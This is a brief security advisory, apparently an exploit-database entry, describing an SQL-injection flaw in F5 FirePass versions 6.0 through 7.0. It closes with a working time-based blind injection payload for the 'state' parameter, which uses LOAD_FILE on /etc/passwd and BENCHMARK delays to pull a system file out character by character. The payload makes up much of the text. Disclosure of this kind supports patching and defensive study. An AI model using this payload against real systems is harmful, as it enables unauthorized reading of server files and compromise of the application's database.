source: https://www.securityfocus.com/bid/52653/info FirePass is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied data before using it in an SQL query. A successful exploit may allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database. The following versions of FirePass are affected: 6.0 6.0.1 6.0.2 6.0.2.3 6.0.3 6.1 7.0 state=%2527+and+ (case+when+SUBSTRING(LOAD_FILE(%2527/etc/passwd%2527),1,1)=char(114)+then+ BENCHMARK(40000000,ENCODE(%2527hello%2527,%2527batman%2527))+else+0+end)=0+--+